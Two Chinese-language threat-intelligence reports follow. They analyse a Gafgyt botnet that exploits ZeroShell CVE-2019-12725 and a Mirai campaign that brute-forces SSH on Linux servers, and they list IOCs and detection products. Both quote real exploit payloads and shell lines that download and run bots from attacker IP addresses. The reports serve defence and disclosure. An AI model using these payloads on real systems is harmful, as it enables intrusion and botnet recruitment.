分析发现这次攻击利用的是ZeroShell远程代码执行漏洞(CVE-2019-12725),该漏洞在2019年7月被发现,攻击者可以通过构造具有固定特征的请求数据发送至目标系统,从而导致恶意代码执行。(ZeroShell是一套用于服务器和嵌入式设备的Linux发行版,它主要为局域网提供所需要的网络服务) 漏洞攻击成功后通过curl命令下载执行shell脚本zero,zero继续通过curl下载Gafgyt木马bot.x86_64和bot.x86并启动执行,分别为64位和32位木马文件。 bot.x86为Gafgyt僵尸网络家族木马样本,启动后首先打印特征字符串“9xsspnvgc8aj5pi7m28p”。 然后针对Linux服务器、android设备、视频监控设备的80、5555、60001端口进行扫描。 针对开放端口的设备利用ZeroShell远程代码执行漏洞(CVE-2019-12725)攻击,执行payload: GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*“;cd /tmp;curl -O http[:]//5.206.227.228/zero;sh zero;” 利用bash shell漏洞攻击,执行payload: shell[:]cd /data/local/tmp; busybox wget http[:]//5.206.227.228/wget -O -> wwww; sh wwww; curl -O http[:]//5.206.227.228/curl; sh curl;rm wwww curl 利用JAWS Webserver未授权shell命令执行漏洞攻击,执行Payload: GET /shell?cd /tmp;wget http[:]//5.206.227.228/jaw;sh jaw;   ZeroShell远程代码执行漏洞(CVE-2019-12725)的攻击流量:   IOCs IP 5.206.227.228 URL http[:]//5.206.227.228/zero http[:]//5.206.227.228/curl http[:]//5.206.227.228/wget http[:]//5.206.227.228/k http[:]//5.206.227.228/bot.x86_64 http[:]//5.206.227.228/bot.x86 http[:]//5.206.227.228/bot.arm5 http[:]//5.206.227.228/bot.arm6 http[:]//5.206.227.228/bot.arm7 http[:]//5.206.227.228/bot.aarch64 http[:]//5.206.227.228/bot.mips http[:]//5.206.227.228/bot.mipsel MD5 2520fc7d13ac3876cca580791d1c33a8 cc84fcc23567228337e45c9fbb78699f 10b9f21795e5ffbd52c407617d0bd4ef 38d8de098c7e560a34dabf8c1a2ed5f0 12b021bcd199585e86dd27523010105b 0e12d891a2fe2cecb6781f3e4d3551b4 aa389e7fb64cf274334712ecb3dfd2cd 2dabb8e039a77f0eb67e938d798ab7c4 03a7f039321ffb9938cc67d65c0b6459 a9109419954a421b712d48ea22b0a7b9 52fb891c536fe449b896f0f2cd2490d4 e2cec25584bfec1e56ee82f350dfeaf9 87859507c0d23793c78d86e0963a7a37 ba903efc3d2e37105e57232e7652b85c 891bbf7b562b34332fac12df2c29ddbb 6d9953a03c568ad97595723d1a09b291 aa9e9627ed6aba6415fb45f742f4f8dd 参考链接: https://www.anquanke.com/vul/id/1030688 https://www.tarlogic.com/advisories/zeroshell-rce-root.txt https://unit42.paloaltonetworks.com/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/ https://github.com/ifding/iot-malware

Mirai 僵尸网络利用弱口令爆破攻击上万台 Linux 服务器

感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/8yTiVyxC6_aapGhrTs1uWw     腾讯安全威胁情报中心检测到Mirai僵尸网络大规模攻击Linux服务器。攻击者针对Linux服务器的SSH(22端口)进行弱口令爆破攻击,成功登陆后执行shellcode下载shell脚本,然后通过shell脚本依次下载基于多个系统平台的Mirai僵尸网络二进制木马程序。 一、概述 腾讯安全威胁情报中心检测到Mirai僵尸网络大规模攻击Linux服务器。攻击者针对Linux服务器的SSH(22端口)进行弱口令爆破攻击,成功登陆后执行shellcode下载shell脚本,然后通过shell脚本依次下载基于多个系统平台的Mirai僵尸网络二进制木马程序。 Mirai是一个大型僵尸网络,主要通过SSH和telnet弱口令进行感染,攻击目标包括监控摄像头、路由器等物联网设备以及Linux服务器,控制机器后通过C&C服务器下发命令进行DDoS攻击。根据腾讯安全威胁情报中心监测数据,Mirai僵尸网络已在全国造成上万台设备感染,其中感染最多的为广东、上海和北京。 腾讯安全专家建议企业linux管理员避免使用弱口令,关闭非必须启用的端口,以防御黑客利用弱口令爆破的方式远程入侵,腾讯安全系列产品也针对Mirai僵尸网络的技术特点进行响应,清单如下: 应用 场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 (SaaS) 1)Mirai僵尸网络相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1)Mirai僵尸网络相关信息和情报已支持检索。 网管可通过威胁追溯系统,分析日志,进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息,可参考:https://cloud.tencent.com/product/atts 云原生安全 防护 云防火墙 (Cloud Firewall,CFW) 基于网络流量进行威胁检测与主动拦截,已支持: 1)Mirai僵尸网络关联的IOCs已支持识别检测; 2)告警弱口令爆破行为。 有关云防火墙的更多信息,可参考: https://cloud.tencent.com/product/cfw 腾讯T-Sec  主机安全 (Cloud Workload Protection,CWP) 1)已支持查杀Mirai僵尸网络相关木马程序; 2)告警弱口令爆破行为。 腾讯主机安全(云镜)提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息,可参考:https://cloud.tencent.com/product/cwp 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全(云镜)、腾讯御知等产品数据导入,为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息,可参考:https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 (腾讯御界) 1)已支持通过协议检测Mirai僵尸网络木马与服务器的网络通信。 关于T-Sec高级威胁检测系统的更多信息,可参考: https://cloud.tencent.com/product/nta 更多产品信息,请参考腾讯安全官方网站https://s.tencent.com/ 二、详细分析 攻击者通过SSH(22端口)弱口令爆破进行远程攻击,攻击成功后执行如下shellcode: cd /tmp || cd /run || cd /; wget http[:]//193.228.91.123/reportandyougaybins.sh; chmod 777 reportandyougaybins.sh; sh reportandyougaybins.sh shellcode使用wget下载shell脚本reportandyougaybins.sh到/tmp目录下并通过sh执行,reportandyougaybins.sh脚本内容如下: reportandyougaybins.sh主要功能为下载和执行二进制木马程序,会分别从以下地址下载基于多个架构体系的样本,其中i586、i686、x86可感染基于Intel处理器的Linux服务器: http[:]//193.228.91.123/mips http[:]//193.228.91.123/mipsel http[:]//193.228.91.123/sh4 http[:]//193.228.91.123/x86 http[:]//193.228.91.123/armv6l http[:]//193.228.91.123/i686 http[:]//193.228.91.123/powerpc http[:]//193.228.91.123/i586 http[:]//193.228.91.123/m68k http[:]//193.228.91.123/sparc http[:]//193.228.91.123/armv4l http[:]//193.228.91.123/armv5l 以i586为例进行分析,该样本的主要功能为与C&C地址通信,接收远程命令对目标发起DDOS攻击。在IOT设备中,通常会有看门狗(watchdog)进程,不断给看门狗进程发送发送心跳可以保持设备不重启。Mirai首先尝试发送控制码0x80045704来关闭看门狗功能,如果未成功关闭,则进入循环不断向其发送保活指令0x80045705。 将木马进程名替换为”/usr/sbin/dropbear”或者”sshd”隐藏自身。 从/proc/net/route中获取本机IP。 初始化table,并将后续要使用的数据添加到table中。 然后table_retrieve_val从table中取出数据,table_lock_val和table_unlock_val分别为加密和解密数据,解密函数在toggle_obf()中实现,解密方法是将数据与table_key进行循环异或,其中table_key=0xDEDEFFBA。 解密并连接C&C服务器194.180.224.103:3982,然后向其发送字符串解密并连接C&C服务器194.180.224.103:3982,然后向其发送字符串“arch xxx”,xxx为设备平台类型。 Mirai与C&C服务器通信TCP流: 获取C&C服务器返回的数据后,进入processCmd处理接收到的命令。 Mirai可根据命令向目标发起以下类型的DDoS攻击:”HTTP”、”CUDP”、”UDP”、”STD”、”CTCP”、”TCP”、”SYN”、”ACK”、”CXMAS”、”XMAS”、”CVSE”、”VSE”、”CNC”。 HTTP攻击: UDP攻击: TCP攻击: SYN攻击: ACK攻击: IOCs IP 193.228.91.123 194.180.224.103 45.95.168.138 45.95.168.190 37.49.224.87 193.228.91.124 185.172.110.185 C&C 194.180.224.103:3982 MD5 649a06f5159fc4e8ee269a9e0e1fd095 8bb40eb446abb7472cb3a892fd2450b4 3f3f8184219514d5834df94f362c74bc ef3b89e44a3a4973575a876ee5105cec 34033f561d196495e5c4780327acca0a 6f637a4ccfd00d9c2e08ecb84ce0b987 03ff0f5521631db7fa0d7990b5b4c19e 91c0f5304438a42ae5f28c8c0ff15954 536accde3643cb8294dd671ae5bdb3a2 9789917095d92cfe507e5fc2266667a1 8bafcd3d57dc597af4b6cb497cf0a0de 7e8e28631962dd5d52cbd93e50e7916e 7bfd106fe9d41c658f3be934346d3ff6 f0d5b7e31b4308c5ec326de9304bd3f4 bd1db394d52b950eed972eae93b80469 8b49a58a0bcb93afe72f1e3c1d800515 97a3699b819496892788b5c7a24be868 990fe40e991b9813a4f73b115ba160cb 2c0cc3d82871cfc05d38ea0a04f7f80a 26c56b011a494886e758d12fc07f6951 6e6d56669554c492ec4b1a9abd23e35b 64e5195e9cde652de6b2623d2d3e098d 1eeee50672a42dc2e55c6d4126afaf26 f6bbcf50aeda03aab1b5bc21b3df3e99 8e7d3e4bedf9bc3ed8a67890edc36590 556bd1d4d93abf19b4075d12ffef02a8 0d5302aa5491b3944566a212ca205923 ef72d6cc859438142a166f1d3ea4d462 193f92152f483aeb7ebe6d42855d9f27 1de00b44ef800a9d878de591fc43b854 b6e5bfb4b2f75d828022b84a247e99f2 039f379f3a36b4ab982a5ada7ceea078 51547b23165bc6f205ec3625840f3800 92137cf8ff782e15995919ebaa658474 94e027f4d33900f116bcf176aba726de aefe0411bd89a9b97c1741b75c9f7d71 d15256b7a475f8934daf79364b0885a1 c624ed18ad756aa6f41a70fe90102d78 5ff2fc4de3a059b504e09b7b1663ac1f fe6d19da030b1d299c35e89639d567bd 24a2659c72a980997161950926063b84 51b2190aa408ae08c6c9bf8dc8acc6e0 ecd696438914cc3c60dbf6de0df48f87 b45af2197eb3d12a199a40a048a36db6 32ef86b0358793f7ceffe1822bbf70e1 60fd7ed2e1ad0d41875d761b899766c4 0970f7f309bc678b0117d600e3f80f5f a1dc1c62dba56af6a8b25767074d691d 1cca73d23c7e50f4111815e840bd8960 42c87649e776dd73aa06033f9b8b750e 08dc3f3c77161e1cc349d91263f76b8c 61915eb8d8742fea42d3683c7255945a 000466d4c6c06398042851a7c049f6b6 0be41e0b52c51ab4ad966513455550b1 6290db15f07f6ebb114824b912a10129 fe19b99077ef4fe492107e4a9b943094 9068c1c69ab5c6ba80f01bab1a1a2ad4 8bb40eb446abb7472cb3a892fd2450b4 2b8796693b5f578c40611e5221fb4788 9f71d8839d89f7bed716bb3f509eb22f 47f12cf0806d2875c592a7d15e266ee6 8ee73860cfe02ca529671c060c18cf00 9e91347c4d8afad598d21e446f967fb2 71d2dc0728e710e4f939c97e88929930 672380fd4c58302e1c48a45e75c580d7 143f7de27921db16b08cea70bb3bef7b 63db9805775b20dae4c0f06e03585446 4a751ef5ef5e48cfef33bd29e2a4a5b7 00bf4ee5a64971260683e047719c0dd8 028b7629ff410f429ba65db1f6779226 URL http[:]//193.228.91.123/ares.sh http[:]//193.228.91.123/arm7 http[:]//193.228.91.123/armv6l http[:]//193.228.91.123/i686 http[:]//193.228.91.123/33bi/Ares.ppc http[:]//193.228.91.123/33bi/Ares.arm6 http[:]//193.228.91.123/33bi/ares.armebv7 http[:]//193.228.91.123/33bi/ares.mips http[:]//193.228.91.123/33bi/Ares.m68k http[:]//193.228.91.123/33bi/ares.mpsl http[:]//185.172.110.185/taevimncorufglbzhwxqpdkjs/Meth.ppc http[:]//185.172.110.185/taevimncorufglbzhwxqpdkjs/Meth.m68k http[:]//185.172.110.185/taevimncorufglbzhwxqpdkjs/Meth.spc http[:]//185.172.110.185/taevimncorufglbzhwxqpdkjs/Meth.i686 http[:]//185.172.110.185/taevimncorufglbzhwxqpdkjs/Meth.sh4 http[:]//185.172.110.185/taevimncorufglbzhwxqpdkjs/Meth.arc http[:]//193.228.91.123/FuckBitchBastardDamnCuntJesusHaroldChristbins.sh http[:]//193.228.91.123/reportandyougaybins.sh http[:]//193.228.91.123/mips http[:]//193.228.91.123/mipsel http[:]//193.228.91.123/sh4 http[:]//193.228.91.123/x86 http[:]//193.228.91.123/armv6l http[:]//193.228.91.123/i686 http[:]//193.228.91.123/powerp http[:]//193.228.91.123/i586 http[:]//193.228.91.123/m68k http[:]//193.228.91.123/sparc http[:]//193.228.91.123/armv4l http[:]//193.228.91.123/armv5l http[:]//194.180.224.103/mips http[:]//194.180.224.103/mipsel http[:]//194.180.224.103/sh4 http[:]//194.180.224.103/x86 http[:]//194.180.224.103/armv6l http[:]//194.180.224.103/i686 http[:]//194.180.224.103/powerpc http[:]//194.180.224.103/i586 http[:]//194.180.224.103/m68k http[:]//194.180.224.103/sparc http[:]//194.180.224.103/armv4l http[:]//194.180.224.103/armv5l 参考链接: https://www.freebuf.com/articles/terminal/117927.html http://blog.nsfocus.net/mirai-source-analysis-report/